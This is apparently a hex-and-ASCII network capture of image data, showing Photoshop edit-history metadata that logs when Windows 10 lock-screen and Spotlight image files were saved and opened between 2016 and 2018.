                                                                                                                                                                                    2023-01-05 07:58:12 UTC8890INData Raw: 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 38 3a 32 36 3a 30 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 37 54 31 32 3a 30 32 3a 33 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 37 54 31 32 3a 32 35 3a 31 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73
                                                                                                                                                                                    Data Ascii: A;2016-07-26T18:26:04-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2016-07-27T12:02:36-07:00&#x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2016-07-27T12:25:14-07:00&#x9;File C:\Users\v-lizagh\MS\Windows
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8906INData Raw: 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 52 65 67 69 73 74 65 72 54 6f 56 6f 74 65 5c 52 65 67 69 73 74 65 72 54 6f 56 6f 74 65 5f 53 70 6f 74 6c 69 67 68 74 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 31 32 54 31 30 3a 33 31 3a 34 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 52 65 67 69 73 74 65 72 54 6f 56 6f 74 65 5c 52 65 67 69 73 74 65 72 54 6f 56 6f 74 65 5f 53 70 6f 74 6c 69 67 68 74 5f 31 30 38 30 78 31 39 32 30 2d 47 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 31 32 54 31 30 3a 33 35 3a 34 34 2d 30 37 3a 30 30 26 23
                                                                                                                                                                                    Data Ascii: C:\Users\v-lizagh\MS\Windows10\RegisterToVote\RegisterToVote_Spotlight_1080x1920.jpg saved&#xA;2016-09-12T10:31:49-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\RegisterToVote\RegisterToVote_Spotlight_1080x1920-G.jpg saved&#xA;2016-09-12T10:35:44-07:00&#
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8922INData Raw: 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 45 64 67 65 53 75 72 67 65 5f 35 30 30 70 78 2d 32 38 31 37 32 36 38 5f 31 30 38 30 78 31 39 32 30 45 46 33 35 35 43 36 35 35 41 35 31 39 38 45 34 33 32 34 35 37 37 39 32 39 43 35 35 43 32 44 35 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 30 2d 31 37 54 31 38 3a 34 31 3a 31 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 53 75 72 67 65 5c 57 65 62 4e 6f 74 65 73 2d 50 72 6f 64 75 63 74 69 76 69 74 79 5c 45 64 67 65 53 75 72 67 65 2d 57 65 62 4e 6f 74 65 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 32 35 37 33 39 33 30 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76
                                                                                                                                                                                    Data Ascii: 15.5\AutoRecover\_EdgeSurge_500px-2817268_1080x1920EF355C655A5198E4324577929C55C2D5.psb saved&#xA;2016-10-17T18:41:13-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\Surge\WebNotes-Productivity\EdgeSurge-WebNotes_GettyImages-172573930_1080x1920.jpg sav
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8930INData Raw: 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 31 36 54 30 38 3a 33 37 3a 32 39 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 57 69 6e 74 65 72 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 52 41 57 53 5c 5f 43 48 4f 53 45 4e 5c 4d 49 54 2d 57 69 6e 74 65 72 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 34 39 36 38 35 32 30 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 31 36 54 30 38 3a 33 37 3a 34 30 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73
                                                                                                                                                                                    Data Ascii: 80x1920_Portrait.psd opened&#xA;2016-11-16T08:37:29-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\WinterEntertainment\RAWS\_CHOSEN\MIT-WinterEntertainment_GettyImages-649685207_1080x1920.jpg saved&#xA;2016-11-16T08:37:40-08:00&#x9;File C:\Us
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8946INData Raw: 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 32 30 54 31 31 3a 31 39 3a 32 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 32 30 54 31 32 3a 31 38 3a 34 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 57 69 6e 74 65 72 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 46 65 62 72 75 61 72 79 5c 4f 53 43 41 52 53 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4d 49
                                                                                                                                                                                    Data Ascii: jpg saved&#xA;2017-01-20T11:19:28-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-01-20T12:18:45-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\WinterEntertainment\February\OSCARS\CHOSEN\Crops\MI
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8962INData Raw: 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 4e 41 41 45 45 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 45 64 67 65 2d 4e 41 41 45 45 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 33 30 30 38 35 37 35 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 33 54 30 39 3a 35 30 3a 32 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 45 64 67 65 2d 4e 41 41 45 45 5f 47 65 74 74 79 49 6d 61 67
                                                                                                                                                                                    Data Ascii: #x9;File C:\Users\v-lizagh\MS\Windows10\Edge\NAAEE\CHOSEN\Crops\Edge-NAAEE_GettyImages-530085757_1080x1920.jpg saved&#xA;2017-02-23T09:50:25-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Edge-NAAEE_GettyImag
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8970INData Raw: 30 38 30 78 31 39 32 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 31 35 54 31 35 3a 32 32 3a 35 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 53 75 72 66 61 63 65 5c 49 6e 6b 50 65 6e 5c 43 48 4f 53 45 4e 5c 53 75 72 66 61 63 65 2d 49 6e 6b 50 65 6e 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 30 39 30 33 33 33 31 39 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 31 35 54 31 36 3a 32 32 3a 30 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 53 75 72 66 61 63 65 5c 49 6e 6b 50 65 6e 5c 43 48
                                                                                                                                                                                    Data Ascii: 080x1920.psd saved&#xA;2017-03-15T15:22:59-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Surface\InkPen\CHOSEN\Surface-InkPen_GettyImages-509033319_1080x1920.jpg saved&#xA;2017-03-15T16:22:04-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Surface\InkPen\CH
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8986INData Raw: 36 30 32 30 32 36 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 31 38 54 31 31 3a 30 33 3a 31 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 45 6d 70 6f 77 65 72 69 6e 67 54 6f 6f 6c 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 39 34 39 39 39 30 39 34 5f 31 30 38 30 78 31 39 32 30 37 43 42 32 42 34 30 36 35 35 31 45 39 36 32 38 35 46 41 38 36 34 37 45 43 45 31 45 34 45 36 32 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 31 38 54 31 31 3a 30 34 3a
                                                                                                                                                                                    Data Ascii: 602026_1080x1920.jpg saved&#xA;2017-04-18T11:03:15-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_EmpoweringTools_GettyImages-94999094_1080x19207CB2B406551E96285FA8647ECE1E4E62.psb saved&#xA;2017-04-18T11:04:
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9002INData Raw: 31 31 39 33 30 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 35 54 31 35 3a 33 34 3a 34 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 61 74 74 52 65 71 75 65 73 74 5c 4c 69 6e 6b 65 64 49 6e 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4c 69 6e 6b 65 64 49 6e 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 34 31 32 32 39 30 39 31 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 35 54 31 35 3a 33 35 3a 35 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b
                                                                                                                                                                                    Data Ascii: 11930_1080x1920.jpg saved&#xA;2017-05-15T15:34:47-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MattRequest\LinkedIn\CHOSEN\Crops\LinkedIn_GettyImages-641229091_1080x1920.jpg saved&#xA;2017-05-15T15:35:55-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lock
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9010INData Raw: 5c 43 72 6f 70 73 5c 4d 53 2d 4d 69 6b 61 69 6c 61 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 35 34 37 37 30 33 33 39 5f 31 30 38 30 78 31 39 32 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 36 2d 30 37 54 30 38 3a 33 33 3a 34 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 69 63 72 6f 73 6f 66 74 5c 4d 69 6b 61 69 6c 61 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 53 2d 4d 69 6b 61 69 6c 61 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 35 34 37 37 30 33 33 39 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 36 2d 30 37 54 30 38 3a 33 36 3a 33 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a
                                                                                                                                                                                    Data Ascii: \Crops\MS-Mikaila_GettyImages-554770339_1080x1920.psd saved&#xA;2017-06-07T08:33:44-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Microsoft\Mikaila\Chosen\Crops\MS-Mikaila_GettyImages-554770339_1080x1920.jpg saved&#xA;2017-06-07T08:36:37-07:00&#x9;File C:
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9026INData Raw: 78 31 39 32 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 33 54 31 39 3a 32 34 3a 33 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 57 69 6e 64 6f 77 73 31 30 2d 54 69 70 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 30 36 36 37 31 30 36 32 5f 31 30 38 30 78 31 39 32 30 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 33 54 31 39 3a 32 37 3a 30 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 57 69 6e 64 6f 77 73 5c 54 69 70 73 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 57 69 6e 64 6f 77 73 31 30 2d 54 69 70 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 38 38 35 30 38 35 38 36 5f 31 30 38 30 78 31 39 32 30
                                                                                                                                                                                    Data Ascii: x1920.psd saved&#xA;2017-07-13T19:24:37-07:00&#x9;File Windows10-Tips_GettyImages-106671062_1080x1920.psd opened&#xA;2017-07-13T19:27:03-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Windows\Tips\Chosen\Crops\Windows10-Tips_GettyImages-488508586_1080x1920
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9042INData Raw: 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 69 6e 6b 65 64 49 6e 5c 4c 65 61 72 6e 69 6e 67 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4c 69 6e 6b 65 64 49 6e 2d 4c 65 61 72 6e 69 6e 67 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 30 38 32 32 33 32 38 30 5f 31 30 38 30 78 31 39 32 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 31 34 54 31 33 3a 34 36 3a 33 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 69 6e 6b 65 64 49 6e 5c 4c 65 61 72 6e 69 6e 67 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4c 69 6e 6b 65 64 49 6e 2d 4c 65 61 72 6e 69 6e 67 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 30 38 32 32
                                                                                                                                                                                    Data Ascii: Users\v-lizagh\MS\Windows10\LinkedIn\Learning\Chosen\Crops\LinkedIn-Learning_GettyImages-108223280_1080x1920.psd saved&#xA;2017-08-14T13:46:39-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\LinkedIn\Learning\Chosen\Crops\LinkedIn-Learning_GettyImages-10822
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9049INData Raw: 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 45 6d 6d 79 73 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 2d 45 6d 6d 79 73 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 36 38 36 38 39 37 31 31 33 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 33 30 54 32 31 3a 33 34 3a 32 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 45 6d 6d 79 73 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 2d 45 6d 6d 79 73 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 34 37 33 31 37 31 39 32 30
                                                                                                                                                                                    Data Ascii: ows10\MomentsInTime\Emmys\Chosen\Crops\MIT-Entertainment-Emmys_shutterstock_686897113_1080x1920.jpg saved&#xA;2017-08-30T21:34:29-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\Emmys\Chosen\Crops\MIT-Entertainment-Emmys_shutterstock_473171920
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9065INData Raw: 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 46 30 31 39 34 34 45 44 31 42 37 43 33 38 42 38 44 46 35 33 38 45 43 44 33 39 43 34 43 43 46 43 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 32 35 54 31 38 3a 30 30 3a 33 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37
                                                                                                                                                                                    Data Ascii: izagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Lockscreen_1080x1920_PortraitF01944ED1B7C38B8DF538ECD39C4CCFC.psb saved&#xA;2017-10-25T18:00:34-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9081INData Raw: 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 39 5c 43 48 4f 53 45 4e 5c 52 65 70 6c 61 63 65 6d 65 6e 74 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 39 5f 4d 61 6e 67 72 6f 76 65 73 54 75 76 61 6c 75 53 50 61 63 69 66 69 63 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 36 30 31 32 39 35 30 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 30 34 54 31 33 3a 33 31 3a 35 31 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31
                                                                                                                                                                                    Data Ascii: v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock2017_Batch9\CHOSEN\Replacements\Lock2017-B9_MangrovesTuvaluSPacific_GettyImages-560129507_1080x1920.jpg saved&#xA;2017-12-04T13:31:51-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock201
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9089INData Raw: 69 67 68 74 5f 46 59 31 38 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4f 66 66 69 63 65 53 70 6f 74 6c 69 67 68 74 46 59 31 38 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 35 35 34 33 39 36 30 35 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 31 34 54 31 35 3a 31 35 3a 33 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4f 66 66 69 63 65 5c 53 70 6f 74 6c 69 67 68 74 5f 46 59 31 38 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4f 66 66 69 63 65 53 70 6f 74 6c 69 67 68 74 46 59 31 38 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 36 35 35 38 31 34 30 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41
                                                                                                                                                                                    Data Ascii: ight_FY18\CHOSEN\Crops\OfficeSpotlightFY18_GettyImages-155439605_1080x1920.jpg saved&#xA;2017-12-14T15:15:38-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Office\Spotlight_FY18\CHOSEN\Crops\OfficeSpotlightFY18_GettyImages-176558140_1080x1920.jpg saved&#xA
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9105INData Raw: 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 56 61 6c 65 6e 74 69 6e 65 73 44 61 79 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 38 38 30 36 36 38 32 35 5f 31 30 38 30 78 31 39 32 30 31 39 30 35 45 35 39 32 45 39 30 43 42 45 30 41 33 36 46 39 34 42 42 42 45 38 30 36 33 31 43 36 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 31 2d 32 34 54 31 36 3a 34 30 3a 32 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 57 69 6e 74 65 72 45 6e 74 65 72 74 61 69 6e 6d
                                                                                                                                                                                    Data Ascii: agh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_MIT-ValentinesDay_GettyImages-188066825_1080x19201905E592E90CBE0A36F94BBBE80631C6.psb saved&#xA;2018-01-24T16:40:28-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\WinterEntertainm
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9121INData Raw: 45 4e 5c 43 72 6f 70 73 5c 4d 49 54 2d 41 77 61 72 64 73 53 65 61 73 6f 6e 2d 4d 6f 76 69 65 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 31 34 34 33 34 34 38 32 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 32 36 54 30 38 3a 33 39 3a 32 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 49 54 2d 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 41 77 61 72 64 53 65 61 73 6f 6e 2d 4d 6f 76 69 65 73 2d 55 4b 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4d 49 54 2d 41 77 61 72 64 73 53 65 61 73 6f 6e 2d 4d 6f 76 69 65 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 34 34 39 39 30 31 38 38 5f 31 30 38 30 78 31 39 32 30 2e 6a
                                                                                                                                                                                    Data Ascii: EN\Crops\MIT-AwardsSeason-Movies_GettyImages-614434482_1080x1920.jpg saved&#xA;2018-02-26T08:39:28-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MIT-International\AwardSeason-Movies-UK\CHOSEN\Crops\MIT-AwardsSeason-Movies_GettyImages-644990188_1080x1920.j
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9129INData Raw: 37 44 35 37 32 30 43 39 36 39 44 34 32 34 33 31 34 39 36 36 37 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 31 32 54 31 34 3a 35 30 3a 31 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 63 6c 6f 73 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 31 32 54 31 34 3a 35 30 3a 31 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 5f 5f 54 65 6d 70 6c 61 74 65 73 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 31 35 54 30 30 3a 34 36 3a
